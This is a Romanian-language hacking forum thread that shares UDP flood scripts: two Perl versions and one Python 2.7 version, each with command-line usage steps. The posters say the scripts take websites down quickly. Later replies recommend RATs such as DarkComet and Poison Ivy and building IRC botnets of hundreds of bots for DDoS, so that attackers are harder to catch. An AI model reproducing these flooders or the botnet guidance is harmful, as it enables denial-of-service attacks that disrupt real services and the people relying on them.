Jump to content
C0nfigurati0n

UDP Power FLood

Recommended Posts

#!/usr/bin/perl

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {

printf "$0 <ip> <port> <time>\n";

printf "for any info vizit http://rstcenter.com/ \n";

exit(1);

}

my ($ip,$port,$size,$time);

$ip=$ARGV[0];

$port=$ARGV[1];

$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);

$iaddr = inet_aton("$ip");

printf "Amu Floodez $ip pe portu $port \n";

printf "daca nu pica in 10 min dai pe alt port \n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {

goto randpackets;

}

if ($ARGV[1] !=0 && $ARGV[2] !=0) {

system("(sleep $time;killall -9 udp) &");

goto packets;

}

if ($ARGV[1] !=0 && $ARGV[2] ==0) {

goto packets;

}

if ($ARGV[1] ==0 && $ARGV[2] !=0) {

system("(sleep $time;killall -9 udp) &");

goto randpackets;

}

packets:

for (;;) {

$size=$rand x $rand x $rand;

send(crazy, 0, $size, sockaddr_in($port, $iaddr));

}

randpackets:

for (;;) {

$size=$rand x $rand x $rand;

$port=int(rand 65000) +1;

send(crazy, 0, $size, sockaddr_in($port, $iaddr));

}

Il savati in extensia .pl blabla il folositi cu Perl

UDP Flood este foarte puternic, poti pica siteuri repede si usor

Cum il folosesc?:

In CMD scri:

udp.pl <ip site> 0 0

Si dai Enter

Bafta, C0nfigurati0n

Link to comment
Share on other sites


#!/usr/bin/perl
##############

# udp flood.
##############

use Socket;
use strict;

if ($#ARGV != 3) {
print "flood.pl <ip> <port> <size> <time>\n\n";
print " port=0: use random ports\n";
print " size=0: use random size between 64 and 1024\n";
print " time=0: continuous flood\n";
exit(1);
}

my ($ip,$port,$size,$time) = @ARGV;

my ($iaddr,$endtime,$psize,$pport);

$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
$endtime = time() + ($time ? $time : 1000000);

socket(flood, PF_INET, SOCK_DGRAM, 17);


print "Flooding $ip " . ($port ? $port : "random") . " port with " .
($size ? "$size-byte" : "random size") . " packets" .
($time ? " for $time seconds" : "") . "\n";
print "Break with Ctrl-C\n" unless $time;

for (;time() <= $endtime;) {
$psize = $size ? $size : int(rand(1024-64)+64) ;
$pport = $port ? $port : int(rand(65500))+1;

send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}

via google... e mai dragalas ca nu e spaghetti code :)

Link to comment
Share on other sites

va sfatuiesc la flooding sa folositi RAT-uri :

De ce?

Odata ca e DDOS, nu DOS, deci sanse mici sa te prinda sau sa opreasca atacul

A doua ca pica mai repede ca perl daca ai boti destui :)

Incercati sa studiati, apoi sa da-ti flood :

Denial-of-service attack - Wikipedia, the free encyclopedia

RAT-uri :

DarkComet ( ?Dark Comet RAT - Tutorial & Features! (HD)?? - YouTube )

Poison Iv (

)

...

Link to comment
Share on other sites

Aveam nevoie de exercitiu asa ca in loc sa pierd timpul aiurea am facut si o versiune pentru python 2.7 !

Nu stiu cat de bine functioneaza l-am testat pe netul meu de 30 lei !

Concluzia? in 0.5 secunde am pierdut conexiunea la net deci banuiesc ca e ceva de capul lui hehe !

Enjoy !

#!/usr/bin/env python
import socket
import sys
import random

#Don't take it without giving proper credits !


def main():
arg = sys.argv

if len(arg) != 3:
print '''[-]Usage:
py_udp flooder by BGS (http://rstcenter.com)
If you don't have bandwidth don't waste your time trying this !
Syntax:
udp_flood.py ip port

[-]Exiting... '''


else:

print '[!]Starting...'
destination = arg[1]
port = int(arg[2])
sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
bytes = random._urandom(1024)
while True:
sock.sendto(bytes,(destination,port))
if socket.timeout == True:
break
print '[-]Task completed!'

if __name__=='__main__':
main()

LE: Nu stiu cat de bine functioneaza (sau daca macar functioneaza )

Edited by BGS
Link to comment
Share on other sites

Tre' sa fii nebun sa folosesti asta de pe netul tau. Faci niste boti, 500-600 si dai de pe ei :)

Traficul ajunge la valori ametitoare, si sunt sanse mari sa pice toata clasa.

Pai atunci iti faci boti intr-un botnet pe irc si dai din botnet DDos

nu iti faci 500-600 boti si dai cu asta :))

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...